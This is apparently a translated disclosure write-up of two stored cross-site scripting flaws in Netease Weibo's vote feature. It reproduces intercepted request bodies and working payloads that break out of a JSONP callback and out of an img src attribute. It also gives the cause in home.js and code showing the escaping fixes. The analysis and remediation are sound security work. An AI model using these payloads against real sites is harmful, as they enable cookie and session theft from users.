First:

1. Post a microblog from the home page, intercept the request in Burp and modify it. The request body is:

    content=test&isRetweet=0&replyOriginal=0&replyIt=0&flag=0&imageUrl=&voteUrl=bbb"><>

   The voteUrl parameter has been changed to bbb"><>. Submit it.

2. Go back to the home page, where the new post is rendered. Burp now shows a request like this (captured later in the test, but it illustrates the problem):

    http://163.fm/GetOriginal?callback=expires&q=T7n6r0L&_=1348642200976

   The response body is:

    jQuery16109319937340915203_1348642196756("bbb"><>");

   This is a JSONP response, and that is the problem: our data is written into it without any escaping. Since this script is loaded into the home page, anything we inject is executed there. So we construct a value that closes the callback call and appends our own JavaScript, which then runs on the home page.

3. Post again, this time with voteUrl set to "); alert(document.cookie); //, and revisit the home page. No pop-up, and no request like the one above. But we had overlooked that the content parameter is the post body, and our post contains a Netease Weibo short link, http://163.fm/T7n6r0L. Move the mouse over it and the magic happens: the JavaScript we inserted runs.

4. voteUrl is literally the address of a vote. From the initial analysis, Netease Weibo converts the parameter straight into a short link without validating it. The content returned by

    http://163.fm/GetOriginal?callback=jQuery16109319937340915203_1348642196756&q=T7n6r0L&_=1348642200976

   confirms this: the argument passed to the callback is the value of voteUrl.

5. The JavaScript executed, but why?
First, search for GetOriginal in Firebug. It is defined in http://img2.cache.netease.com/t/cssjs/439756/script/page/home.js:

    define("utils/DataSource", function (a, b, c) {
        var d = a("external/jquery"),
            e = a("model/UserData"),
            f = a("utils/log/Logger"),
            g = {
                keyFrom: null,
                requestMap: {
                    longUrl: { url: "http://163.fm/GetOriginal", login: !1 },
                    ...

That is only the definition. Searching home.js for longUrl finds the code that uses it:

    define("task/queueURL", function (a, b, c) {
        var d = a("task/TaskManager"),
            e = a("task/Task");
        d.add(new e("signedURL", function () {
            var B = a("external/jquery"),
                c = a("utils/DataSource");
            // every unprocessed short link gets a mouseenter handler
            B(document.body).delegate(".short-url:not(.processed)", "mouseenter", function (a) {
                var d = B(a.target),
                    e = d.addClass("processed").text();
                if (e.indexOf("http://163.fm") === 0) {
                    var f = e.substr(14);            // the 7 characters after "http://163.fm/"
                    c.get("longUrl", { q: f }, function (a) {
                        d.attr("title", a);          // long URL becomes the link's title
                    }, "jsonp");
                }
            });
        }));
    });

From this code the cause of the problem is roughly clear:

a) We change the voteUrl parameter and publish a post.
b) voteUrl is converted into a short link, and the long URL behind that short link is the value of voteUrl.
c) The post contains the short link. When the mouse moves over it, the mouseenter event fires.
d) The mouseenter handler takes the seven characters after the short link prefix, uses them as the q parameter and requests http://163.fm/GetOriginal as JSONP. This is the step in which our JavaScript executes, because the long URL is written unescaped into the JSONP response.
e) Finally, the real long URL behind the short link is placed in the title attribute of the post's a tag.

Solution:

1. Validate the voteUrl parameter.
2. JavaScript-escape the value of voteUrl when generating the JSONP response.
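The whole chain above, as an added example that is not part of the original post and not Netease's code: a Node.js model of the GetOriginal JSONP endpoint reconstructed from the behaviour described (the real server-side code is not public, so the endpoint logic, the fix, and the function names are assumptions). It shows the voteUrl payload from step 3 executing when the long URL is concatenated into the script, and being handed to the callback as plain data once the callback name is restricted and the value is JSON-encoded. The browser's evaluation of the script tag is simulated with new Function, with alert and document stubbed.

```javascript
// Added example, not Netease's code: a model of the 163.fm/GetOriginal JSONP
// endpoint reconstructed from the post. Endpoint logic, fix and names are
// assumptions. Runs under Node.js (uses the global URL class).

// Callback name as seen in the captured request
const CB = "jQuery16109319937340915203_1348642196756";

// voteUrl value used in step 3 above, stored unchecked as the "long URL"
const PAYLOAD = '"); alert(document.cookie); //';

// Vulnerable: the stored long URL is concatenated straight into the script
// body that the browser will evaluate.
function jsonpVulnerable(callback, longUrl) {
  return callback + '("' + longUrl + '");';
}

// Hardened: the callback name is restricted to a plain identifier (so the
// callback parameter cannot inject code either) and the value is JSON-encoded,
// which escapes the quote and backslash used to break out of the literal.
// "<" and U+2028/2029 are escaped too, for older engines and inline contexts.
const CALLBACK_RE = /^[A-Za-z_$][\w$]{0,63}$/;
function jsonpHardened(callback, longUrl) {
  if (!CALLBACK_RE.test(callback)) throw new Error("invalid JSONP callback name");
  const encoded = JSON.stringify(longUrl)
    .replace(/</g, "\\u003c")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
  return callback + "(" + encoded + ");";
}

// Solution step 1: accept only an http(s) URL as a vote address at creation.
function isAcceptableVoteUrl(s) {
  try {
    const u = new URL(s);
    return u.protocol === "http:" || u.protocol === "https:";
  } catch (e) {
    return false;
  }
}

// Simulates the browser evaluating the JSONP response as a <script>: the
// callback plays the jQuery success handler (d.attr("title", a) in home.js);
// alert and document are stubbed so we can observe whether injected code ran.
function runJsonp(script) {
  const seen = { title: null, alerted: false, cookie: null };
  const fn = new Function(CB, "alert", "document", script);
  fn(
    function (a) { seen.title = a; },
    function (msg) { seen.alerted = true; seen.cookie = msg; },
    { cookie: "sid=constructed-session-value" } // constructed stand-in cookie
  );
  return seen;
}

console.log("vulnerable response:", jsonpVulnerable(CB, PAYLOAD));
console.log("  ->", runJsonp(jsonpVulnerable(CB, PAYLOAD)));
console.log("hardened response:  ", jsonpHardened(CB, PAYLOAD));
console.log("  ->", runJsonp(jsonpHardened(CB, PAYLOAD)));
console.log("voteUrl accepted at creation?", isAcceptableVoteUrl(PAYLOAD));
```

JSON encoding alone fixes the value, not the callback parameter, which is why the hardened version also allowlists the callback name; a JSONP endpoint that reflects an arbitrary callback is a script-injection sink of its own. Serving the response with an application/javascript content type and X-Content-Type-Options: nosniff is the usual accompanying measure.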
Second:

Although the previous vulnerability was delivered through a post, it still needed a small interaction (hovering over the short link) to trigger, even if most people would do it. In this Netease Weibo vulnerability, the XSS fires as soon as the post is viewed.

1. The vulnerability is in the voting feature.

2. Images can be uploaded when creating a vote, and XSS tends to show up in such places. Upload an image, add the other vote options and intercept the request when submitting. The following data is sent to the server:

    title=%E9%92%93%E9%B1%BC%E5%B2%9B&description=&option%5B%5D=%E4%B8%AD%E5%9B%BD%E7%9A%84&option%5B%5D=%E4%B8%AD%E5%9B%BD%E7%9A%84&voteType=1&endTime=&coverurl=http%3A%2F%2F126.fm%2F2bqmHT&smallCoverurl=http%3A%2F%2Ftimge4.126.net%2Fimage%3Fw%3D322%26h%3D115%26url%3Dhttp%253A%252F%252F126.fm%252F2bqmHT%26gif%3D1%26quality%3D85

3. In the actual test I appended a string like "><bbb> to each parameter, created the vote, published a post, viewed the post just published and searched its source for <bbb>. The string turned up right after the img tag. Since this is the home page view, which uses the small thumbnail, the smallCoverurl parameter is evidently the one that is not filtered properly.

4. Create a new vote and submit the following:

    title=%E9%92%93%E9%B1%BC%E5%B2%9B&description=&option%5B%5D=%E4%B8%AD%E5%9B%BD%E7%9A%84&option%5B%5D=%E4%B8%AD%E5%9B%BD%E7%9A%84&voteType=1&endTime=&coverurl=http%3A%2F%2F126.fm%2F2bqmHT&smallCoverurl=http%3A%2F%2Ftimge4.126.net%2Fimage%3Fw%3D322%26h%3D115%26url%3Dhttp%253A%252F%252F126.fm%252F2bqmHT%26gif%3D1%26quality%3D85"onload=alert(1) a="

5. View the newly published post and our alert(1) runs. Or visit http://t.163.com/0086269676.

Solution:

1. Encode the coverurl and smallCoverurl parameters. I have not tested the coverurl parameter, but I think it should have the same problem.
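An added example, not from the post and not Netease's code, of why the value in step 4 works and what "encode the parameter" means in practice. The template and the class name are assumptions; only the parameter name and the payload come from the post. A small attribute tokenizer stands in for the browser's start-tag parsing so the effect can be checked in Node.js without a DOM.

```javascript
// Added example, not Netease's code: the smallCoverurl value from step 4
// rendered into an <img> attribute with and without attribute encoding.
// The template is an assumption; the parameter name and payload are from the post.

// Percent-decoded form of the smallCoverurl field submitted in step 4
const SMALL_COVER_PAYLOAD =
  'http://timge4.126.net/image?w=322&h=115&url=http%3A%2F%2F126.fm%2F2bqmHT' +
  '&gif=1&quality=85"onload=alert(1) a="';

// Vulnerable template: raw string concatenation into a quoted attribute value.
// The quote in the payload ends src, and onload=alert(1) becomes an attribute.
function renderThumbVulnerable(smallCoverurl) {
  return '<img class="vote-cover" src="' + smallCoverurl + '">';
}

// Attribute-context encoding: every character that can close the quoted
// value or start a tag is replaced with an entity. The browser decodes the
// entities when it reads the attribute, so the URL is unchanged for the user.
function escapeAttr(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderThumbSafe(smallCoverurl) {
  return '<img class="vote-cover" src="' + escapeAttr(smallCoverurl) + '">';
}

// Minimal attribute tokenizer mirroring how a browser splits a start tag:
// a quoted value runs to the matching quote, an unquoted value to whitespace.
// Returns a map of lower-cased attribute names to their raw values.
function parseAttrs(tag) {
  const attrs = {};
  const body = tag.replace(/^<[a-zA-Z][^\s>]*\s*/, "").replace(/\s*\/?>$/, "");
  const re = /([^\s=\/>]+)(?:\s*=\s*("[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  let m;
  while ((m = re.exec(body)) !== null) {
    let v = m[2] === undefined ? "" : m[2];
    if (/^["']/.test(v)) v = v.slice(1, -1);
    attrs[m[1].toLowerCase()] = v;
  }
  return attrs;
}

// True if the rendered tag carries any on* event-handler attribute
function hasEventHandler(tag) {
  return Object.keys(parseAttrs(tag)).some((k) => /^on[a-z]+$/.test(k));
}

console.log("vulnerable:", renderThumbVulnerable(SMALL_COVER_PAYLOAD));
console.log("  attributes:", parseAttrs(renderThumbVulnerable(SMALL_COVER_PAYLOAD)));
console.log("safe:      ", renderThumbSafe(SMALL_COVER_PAYLOAD));
console.log("  attributes:", parseAttrs(renderThumbSafe(SMALL_COVER_PAYLOAD)));
```

Encoding at the output point is what makes the page safe regardless of how the value was stored; restricting coverurl and smallCoverurl to URLs on the expected image hosts at creation time is a useful second layer, but on its own it does not fix the template.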